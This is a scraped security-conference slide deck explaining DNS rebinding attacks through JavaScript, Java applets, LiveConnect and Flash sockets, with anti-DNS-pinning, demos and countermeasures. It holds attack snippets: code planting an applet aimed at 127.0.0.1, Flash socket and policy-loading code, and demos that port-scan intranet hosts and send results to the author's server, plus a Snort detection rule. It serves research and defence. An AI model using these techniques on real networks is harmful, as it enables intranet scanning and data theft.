410 likes | 533 Views
DNS Rebinding and Socket API Kanatoko <anvil@jumperz.net> http://www.jumperz.net/. DNS Rebinding Overview(1). One of the attack vectors Not a bug of a certain software All kinds of Operating Systems may be affected Windows, Linux, MacOSX … There are no patches
E N D
DNS Rebinding and Socket API Kanatoko <anvil@jumperz.net> http://www.jumperz.net/
DNS Rebinding Overview(1) • One of the attack vectors • Not a bug of a certain software • All kinds of Operating Systems may be affected • Windows, Linux, MacOSX … • There are no patches • Occurs in the relationship with Web servers, DNS servers, proxy servers • Real threat • Maybe your system is vulnerable
DNS Rebinding Overview(2) • Eve controls the web browser of Alice • and make it do something • Stealing information • Make Alice attack • Not a direct attack against the servers • Not an attack against the DNS servers
How the attack is deployed? • Deployed when Alice visits Eve’s trap page • Same as XSS, CSRF • Unawares • Social engineering with using E-mails, BBS, comments on blogs • It is difficult to find out whether the page is a trap or not • Sometimes the hacked web sites ( like famous companies) are used to deploy the attack
Technologies used in DNS Rebinding • JavaScript • Java • FLASH • Malicious codes starts running on the Alice’s browser • But there are security constraints • For example: Cannot read from or write to the local files • Each of these technologies has a network access function
When Alice visits Eve’s page…(1) • Eve’s malicious code starts running and accesses over the network • JavaScript • Get resources using XMLHttpRequest,SCRIPT tag,IMG tag(HTTP) • FLASH: • URLLoader(HTTP), • Socket(TCP) • Java: • URLConnection(HTTP), • Socket(TCP) • DatagramSocket(UDP)
When Alice visits Eve’s page…(2) • Of course there are security constraints on the network access functions • Can access only to the origin host on that Java Applets(.class,.zip,.jar), FLASH SWF files, web pages are located • Known as “Same Origin Policy”
DNS Rebinding attack vector(1) • Eve owns the top level domain “eve.tld” • So Eve can control the DNS server of “eve.tld” • Eve runs a web server at “218.45.25.5” and locates the malicious codes there • Eve binds “218.45.25.5” as the address of the hostname “www.eve.tld”. Eve sets very short value ( for example, 8 seconds ) as a TTL value of the DNS record • Alice tries to access to the Eve’s trap page located at “www.eve.tld” • The first name resolution is done by Alice and “218.45.25.5” is returned from the Eve’s DNS server. • Alice’s browser loads the Eve’ s trap page. • Soon TTL expires • At the same time, Eve changes the configuration of the DNS server and binds “127.0.0.1” as the address of the hostname “www.eve.tld”
DNS Rebinding attack vector(2) • The Eve’s malicious code on the Alice’s browser tries to access to “www.eve.tld” • The second name resolution is done by Alice. This time “127.0.0.1” is returned from the Eve’s DNS server. • The code accesses to “127.0.0.1” • Though “127.0.0.1” is not an Eve’s host, the code is allowed to access to “127.0.0.1” because the hostname is “www.eve.tld” ( same origin ) • As the example above shows, DNS Rebinding enables Eve to access to the addresses like “127.0.0.1” which of course should not be allowed to access
What is DNS Pinning? • Only FLASH is vulnerable to the DNS Rebinding attack vector explained in the previous page • The other two technologies ( JavaScript and Java ) caches the DNS information in their own ways • TTL does not expire. This behavior violates the DNS protocol • It is called as “DNS Pinning” • Sun Microsystems implements DNS Pinning on Java as a countermeasure to DNS Rebinding ( or DNS Spoofing ). • On the other hand, the browser vendors( Microsoft, Mozilla.org and Opera ) seem that they are not so conscious of DNS Rebinding • Eve needs to make Alice discard the cached DNS information to execute DNS Rebinding
What is Anti-DNS Pinning(1) • Make Alice discard the pinned DNS information • Can be applied only to JavaScript • FLASH does not pin DNS at all • Java never discards the pinned DNS information. Java is immune to Anti-DNS Pinning • Martin Johns notified this issue to the security community at Aug 2006 • http://shampoo.antville.org/stories/1451301/
What is Anti-DNS Pinning(2) • If an access to the server fails after an appropriate period has elapsed, the browser discards the pinned DNS information and executes the second name resolution • Change the firewall rule • Shut down the web server • Make Alice access to the closed port (for example- http://example.com:81/) • Anti-DNS Pinning make Eve possible to force Alice execute the second name resolution. Eve can launch DNS Rebinding as a result • Anti-DNS Pinning is a step used in DNS Rebinding (against JavaScript)
DNS Rebinding against JavaScript • XMLHttpRequest is mainly used • Get information from the web servers to those Eve cannot access without DNS Rebinding, and send it to the Eve’s host • The targets are only web servers because HTTP is used in the communication • It is not “Cross Domain” but “Cross Address”. So the HTTP requests do not contain Cookies and Authorization headers of the target web page • For this reason it is not used in CSRF. • For the same reason it means almost nothing to force Alice to get information from the Internet. So the Intranet is the main target • There are some exceptions. If an address-based authentication ( for example: The countermeasure of Universal PDF XSS issue) exists, Eve may use DNS Rebinding for get information via the Alice’s browser • Stolen information is sent to the Eve’s another host. It is quite easy for Eve because there are no “Same Origin Policy” about sending data with JavaScript
Demo:DNS Rebinding on JavaScript • http://www.jumperz.net/index.php?i=2&a=1&b=7 • Get information from the Intranet and send it to “www.jumperz.net” • I was skeptical about whether DNS Rebinding is a real threat, when I read the Martin’s article for the first time • It took me 20 hours to make this demo to work stably • Web application(JSP), DNS server(djbdns) and JavaScript on the browser are used • Uses “closed port method” to launch Anti-DNS Pinning • Special Thanks to Kawa from Team Tidori
JavaScript on each browser • On Firefox, the code needs to wait for about 2 minutes to launch Anti-DNS Pinning • On IE6 and Opera, the code only needs to wait for the TTL value( a few seconds ) • IE7- not checked yet
Countermeasures for DNS Rebinding on JavaScript • Require authentication for HTTP accesses • Basic authentication is enough • Disabling JavaScript is perfect • It is not a threat because easy and good countermeasures exist • Of course the default usernames/passwords ( of ADSL routers, for example ) need to be changed
DNS Rebindingon FLASH and Java(1) • Socket APIs available • The Eve’s code can implement any TCP based protocol • It is far more dangerous than DNS Rebinding on JavaScript • To any hosts on the Internet and the Intranet • With Any TCP based protocol • From Alice’s browser • Portscan • SPAM e-mails • Exploiting known vulnerabilities • File sharing network • DoS attacks • Exploiting address based authentications
DNS Rebindingon FLASH and Java(2) • Eve can use the Alice’s browser as a TCP( or UDP ) proxy because the Eve’s malicious code can send and receive data in anytime using another host like “www2.eve.tld” even on a DNS rebound situation • The Alice’s system ( or network ) could be both a victim and an assailant
DNS Rebindingon Java(1) • Sun’s Java Virtual Machine • The code runs under a security restriction called “Sandbox” • The host that is allowed to communicate over the network with Java applet is the origin of the applet. It is not the origin of the web page • The Socketclass(TCP) and the DatagramSocket(UDP) class are available • Binary data can be sent and received • Caches the DNS record until the termination of the process ( forever ). It is a very strong DNS Pinning • Apparently violates the DNS protocol. It makes trouble when you implement some server applications like SMTP server with using Java • The JVM parameter “networkaddress.cache.ttl” enables you to control this behavior. But still in this case the TTL value of the DNS record is ignored • The “networkaddress.cache.ttl” parameter cannot be set from the Java applet
DNS Rebindingon Java(2) • There was a related issue • http://www.cs.princeton.edu/sip/news/sun-02-22-96.html • There are no configurations like “Disable sockets on the Java applets” • We cannot remove the Socket class from Java because it is also used in the download process of the applet • Java downloads the applet by itself. Not relies on the browser • So the cache of the browser is not used when the applet is downloaded by Java • Java does name resolution for downloading • The point is that the Java does name resolution BEFORE the applet has downloaded • And the result of the name resolution will be cached forever
DNS Rebindingon Java(3) • If the Eve’s DNS server returns the fake IP address as a result of the Alice’s name resolution, the Java applet will not be downloaded and the attack will fail • If the Eve’s DNS server returns a correct IP address as a result of the Alice’s name resolution, the Java applet will be downloaded properly. But Eve cannot rebind the IP address because the Alice’s Java caches the result of the first name resolution forever. The attack will fail as a result • In both case the attack will fail • Only the users behind proxy servers are vulnerable • The business users in the cooperation network with the application proxy gateway are vulnerable than the home users with NAT
DNS Rebindingon Java(4) • Make the proxy server cache the Java applet before Java is activated //make the proxy cachethe applet var foo = new Image(); foo.src = “http://12345.jumperz.net/exploits/MTCPCApplet.class”; //wait for the TTL to expire setTimeout( 'f1()', 1000 * 12 ); //add the applet tag to the page function f1() { var base = document.getElementById( "base" ); var str = '<applet code="MTCPCApplet.class" codebase="http://12345.jumperz.net/exploits/">' + '<param name="address" value=“127.0.0.1">' + '</applet>'; base.innerHTML = str; }
DNS Rebindingon Java(5) • The downloading of the Java applet is done by the proxy server though Java does a name resolution and a spoofed IP address is returned. The cache of the Java applet in the proxy server is returned to the Alice’s Java, and the Eve’s malicious code starts running successfully - The request of the browser GET /exploits/MTCPCApplet.class HTTP/1.0 Accept: */* Referer: http://1190066223254.jumperz.net/exploits/ap3.jsp?address=127.0.0.1 Accept-Language: ja User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727) Host: 1190066223254.jumperz.net Cookie: JSESSIONID=C6D04DDABD28F3B0FACE61F9EA70B44A Connection: Keep-Alive - The request of the Java applet GET /exploits/MTCPCApplet.class HTTP/1.1 User-Agent: Mozilla/4.0 (Windows 2000 5.0) Java/1.6.0_02 Host: 1190066223254.jumperz.net Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Cookie: JSESSIONID=C6D04DDABD28F3B0FACE61F9EA70B44A Connection: keep-alive
Demo: DNS Rebinding on Java • http://www.jumperz.net/index.php?i=2&a=1&b=10 • Scan some ports and retrieve the banner from the server, and send the result to “www.jumperz.net” • Works on IE, Firefox, and Opera • Works only on users behind proxy
Countermeasures for DNS Rebinding on Java(1) • Disabling Java • Restrict the ports allowed to connect to with using personal firewalls ( for example: only 80 and 443 ) • Require authentication for every protocol used on the Intranet • Patch known vulnerabilities • Use firewall to find and stop the outgoing attacks.( for example UDP 53 DoS ) • It is not easy to find the malicious Java code on the gateway or IDS or IPS because the Java applet class file could be zipped into .zip and .jar files
Countermeasures for DNS Rebinding on Java(2) • Setup a JRE only for the Java applets and patch the SecurityManager class public void checkConnect(String host, int port) { if (host == null) { throw new NullPointerException("host can't be null"); } host = "127.0.0.2"; if (!host.startsWith("[") && host.indexOf(':') != -1) { host = "[" + host + "]"; } if (port == -1) { checkPermission(new SocketPermission(host, SecurityConstants.SOCKET_RESOLVE_ACTION)); } else { checkPermission(new SocketPermission(host+":"+port, SecurityConstants.SOCKET_CONNECT_ACTION)); } }
DNS Rebinding on LiveConnect • Works only if both Java and JavaScript are enabled • One can write a Java code in a JavaScript code • var s = new java.net.Socket( "www.jumperz.net", 25 ) • It is a part of the “LiveConnect” technology • Not supported on IE • Eve can send the malicious Java code to Alice before Java is activated • The users NOT behind proxy are also vulnerable • On the implementation of LiveConnect of Opera it seems that there are some bugs • Firefox is the most dangerous browser
Demo: DNS Rebinding on LiveConnect • http://www.jumperz.net/index.php?i=2&a=1&b=9 • A collaboration of Martin Johns and me • http://shampoo.antville.org/stories/1566124/ • Scan some ports and retrieve the banner from the server, and send the result to www.jumperz.net • Works on Firefox and Opera
Countermeasures for DNS Rebinding on LiveConnect • The same as those of Java
DNS Rebinding on FLASH(1) • The Socket class is available from ActionScript 3.0 • Can communicate with server using TCP layer protocol • Binary data can be sent and received • Works on Flash Player 9.0 or later • The host that is allowed to communicate over the network with FLASH is the origin of the FLASH .swf file. It is not the origin of the web page • FLASH does not implement DNS Pinning at all • The DNS information will be discarded after the TTL has elapsed • DNS Rebinding on FLASH is very easy • It is a threat that FLASH has added the Socket class because FLASH is one of the most widely used plugins. Many users enable FLASH on their browsers • There are no configurations like “Disable sockets on FLASH”
DNS Rebinding on FLASH(2) • An example code of the Socket class private var sock1:Socket; private function test1():void { var sock1:Socket = new Socket(); sock1.addEventListener( Event.CONNECT, onConnected ); sock1.connect( “www.jumperz.net", 80 ); } private function onConnected( e:Event ):void { sock1.writeMultiByte( "GET / HTTP/1.0\r\n\r\n", "ISO-8859-1" ); }
DNS Rebinding on FLASH(3) • Can connect only to ports over 1024 by default. This is a difference between FLASH and Java • Policy-loading is required to connect to ports under 1024. This is done by using a TCP-based original protocol • Policy-loading is done successfully under NAT • Eve could use port 443 for policy-loading • Detecting the network traffic of the policy-loading with IDS or IPS would have some meaning • An example signature ( Snort ) • alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FLASH Socket policy-file-request"; flow:to_server,established; content:"<policy-file-request/>"; nocase; )
DNS Rebinding on FLASH(4) • An example code of policy-loading and the traffic //load policy using port 2 flash.system.Security.loadPolicyFile( "xmlsocket://www.jumperz.net:2" ); from client to server <policy-file-request/> from server to client <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.jumperz.net" to-ports="*" /> </cross-domain-policy>
Demo: DNS Rebinding on FLASH • http://www.jumperz.net/index.php?i=2&a=1&b=8 • This demo notified the existence of the Socket class of FLASH to the security community • Works on Flash Player 9.0 or later • Cannot scan ports under 1024 in non-NAT network because of the FLASH policy-loading mechanism • Scan some ports and retrieve the banner from the server, and send the result to “www.jumperz.net”
Countermeasures for DNS Rebinding on FLASH(1) • Disabling FLASH • The same as those of Java
Countermeasures for DNS Rebinding on FLASH(2) • Patch .dll or .ocx files • Overwrite the “call” instruction to the “connect” winsock API • Almost no side effects ( you still can see YouTube ) BEFORE AFTER
Dynamic DNS and DNS Pinning • At some point an IP address is used by the Bob’s web server • Alice visits the Bob’s web site • Bob’s connection has lost and he reconnect to the Internet, and the IP address of the Bob’s server has changed • Soon Bob rebinds the new IP address with the Bob’s hostname with using some Dynamic DNS system • Eve gets Bob’s old IP address ( bound by ISP, with DHCP ) • If Alice has pinned the DNS information of the Bob’s hostname, the Alice’s HTTP requests will be sent to the Eve’s web server. Of course those should be sent to the Bob’s web server • In this case Eve can get the Alice’s session id from the cookie and can hijack her session • This will happen to every web sites because every service based on DNS is “dynamic” in long term • It means that DNS Pinning may cause another security problem
Countermeasures on all 3 technologies • Monitoring DNS packets (Is there any good system for this purpose ?) • Change of IP address in a short period • Especially from global IP to private IP • It is hard to find DNS Rebinding attacks from the TTL values because very short TTL values are widely used • The plugins of Firefox is useful ( NoScript, FlashBlock etc)
Other things • DNS Rebinding is a really complicated problem • Web browsers • Plugins • DNS • Proxies • Real threat • We cannot find attacks if it is not prepared to find • Do we need some detection system for DNS Rebinding, as a first step? • We need more flexible configurations on the browsers • “Disable/Enable Sockets on Java/FLASH” • “IP address has changed” notification dialogs
Thank you! • Any questions?